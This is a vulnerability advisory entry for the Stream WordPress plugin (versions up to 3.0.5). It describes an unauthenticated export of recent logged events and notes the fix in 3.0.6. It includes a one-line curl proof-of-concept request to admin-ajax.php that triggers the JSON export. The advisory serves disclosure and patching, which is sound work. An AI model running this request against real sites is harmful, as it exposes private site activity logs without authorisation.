Lucene search

K
wpvulndbJames GolovichWPVDB-ID:8FA150BE-75C2-48B3-8D3B-BC623F25DEBD
HistoryMay 31, 2016 - 12:00 a.m.

Stream <= 3.0.5 - Unauthenticated Events Export

2016-05-3100:00:00
James Golovich
wpscan.com
5

The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries. Reported to maintainers on 5/25/2016 and new version released 5/30/2016

PoC

curl -i -X POST -H “Content-Type:application/x-www-form-urlencoded” -d “action=nonexistingaction” ‘http://example.com/wordpress/wp-admin/admin-ajax.php?page=wp_stream&amp;record-actions;=export-json

CPENameOperatorVersion
streamlt3.0.6